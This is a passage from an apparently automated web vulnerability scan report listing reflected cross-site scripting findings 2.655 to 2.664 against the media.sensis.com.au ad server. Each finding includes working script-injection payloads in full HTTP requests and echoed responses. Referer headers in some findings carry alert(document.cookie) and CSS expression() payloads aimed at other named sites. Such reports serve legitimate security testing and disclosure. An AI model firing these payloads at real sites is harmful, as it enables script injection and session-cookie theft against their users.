2.655. http://media.sensis.com.au/hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52b0"><script>alert(1)</script>b73d22e5bb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverc52b0"><script>alert(1)</script>b73d22e5bb4/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:42 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 517
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000c52b0"><script>alert(1)</script>b73d22e5bb4/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.656. http://media.sensis.com.au/hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c047"><script>alert(1)</script>1febf5f062e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random9c047"><script>alert(1)</script>1febf5f062e=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:43 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 517
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000/acc_random9c047"><script>alert(1)</script>1febf5f062e=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.657. http://media.sensis.com.au/hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e17f7"><script>alert(1)</script>84778b7d10b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?e17f7"><script>alert(1)</script>84778b7d10b=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:41 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 520
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342f992cb881e00000000/acc_random=868746713064/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?e17f7"><script>alert(1)</script>84778b7d10b=1" target="_new">
...[SNIP]...

2.658. http://media.sensis.com.au/hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d7cf"><script>alert(1)</script>4810e0e86c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver1d7cf"><script>alert(1)</script>4810e0e86c5/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:44 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 510
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e000000001d7cf"><script>alert(1)</script>4810e0e86c5/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATM
...[SNIP]...

2.659. http://media.sensis.com.au/hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd602"><script>alert(1)</script>a3aedddad14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomdd602"><script>alert(1)</script>a3aedddad14=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:45 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 510
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e00000000/acc_randomdd602"><script>alert(1)</script>a3aedddad14=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=
...[SNIP]...

2.660. http://media.sensis.com.au/hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b786"><script>alert(1)</script>0182aa35b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?4b786"><script>alert(1)</script>0182aa35b97=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:42 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 513
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e00000000/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?4b786"><script>alert(1)</script>0182aa35b97=1" target="_new">
...[SNIP]...

2.661. http://media.sensis.com.au/hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34243"><script>alert(1)</script>6d116edc05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver34243"><script>alert(1)</script>6d116edc05/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:47 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 470
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c000000000000000034243"><script>alert(1)</script>6d116edc05/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007/relocate=http://clk.atdmt.c
...[SNIP]...

2.662. http://media.sensis.com.au/hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a555"><script>alert(1)</script>7e8109175e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random7a555"><script>alert(1)</script>7e8109175e0=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:48 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 479
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000308680000000000000000/acc_random7a555"><script>alert(1)</script>7e8109175e0=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007/relocate=http://clk.redcated/OMA/go/2
...[SNIP]...

2.663. http://media.sensis.com.au/hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8beb9"><script>alert(1)</script>9c3d5ee6454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007?8beb9"><script>alert(1)</script>9c3d5ee6454=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://bigpondmusic.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:46 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 474
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007?8beb9"><script>alert(1)</script>9c3d5ee6454=1&relocate=http://clk.redcated/OMA/go/270181140/direct/01/"target="_blank">
...[SNIP]...

2.664. http://media.sensis.com.au/hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629f3"><script>alert(1)</script>3010571870b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver629f3"><script>alert(1)</script>3010571870b/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
